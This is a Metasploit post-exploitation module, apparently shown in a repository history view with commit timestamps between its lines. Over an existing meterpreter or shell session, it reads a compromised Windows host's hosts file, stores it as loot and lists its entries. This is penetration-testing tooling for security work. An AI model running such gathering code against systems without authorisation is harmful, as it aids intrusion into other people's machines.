metasploit-framework/modules/post/windows/gather/enum_hostfile.rb

67 lines
1.5 KiB
Ruby
Raw Normal View History

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
2016-03-08 13:02:44 +00:00
class MetasploitModule < Msf::Post
2013-08-30 21:28:54 +00:00
def initialize(info={})
super(update_info(info,
'Name' => 'Windows Gather Windows Host File Enumeration',
'Description' => %q{
This module returns a list of entries in the target system's hosts file.
},
'License' => BSD_LICENSE,
'Author' => [ 'vt <nick.freeman[at]security-assessment.com>'],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter', 'shell' ]
))
end
2013-08-30 21:28:54 +00:00
def run
# read in the hosts in the hosts file.
fd = session.fs.file.new("C:\\WINDOWS\\System32\\drivers\\etc\\hosts", "rb")
2013-08-30 21:28:54 +00:00
# Load up the original hosts file
buf = ''
until fd.eof?
buf << fd.read
end
2013-08-30 21:28:54 +00:00
# Finished loading the hosts file, close fd
fd.close
2013-08-30 21:28:54 +00:00
# Store the original hosts file
p = store_loot(
'hosts.confige',
'text/plain',
session,
buf,
'hosts_file.txt',
'Windows Hosts File'
)
2013-08-30 21:28:54 +00:00
# Split lines
lines = buf.split("\n")
2013-08-30 21:28:54 +00:00
# Print out each line that doesn't start w/ a comment
entries = []
lines.each do |line|
next if line =~ /^[\r|\n|#]/
entries << line
end
2013-08-30 21:28:54 +00:00
# Show results
if not entries.empty?
print_line("Found entries:")
entries.each do |e|
print_good(e.to_s)
end
end
2013-08-30 21:28:54 +00:00
print_status("Hosts file saved: #{p.to_s}")
end
end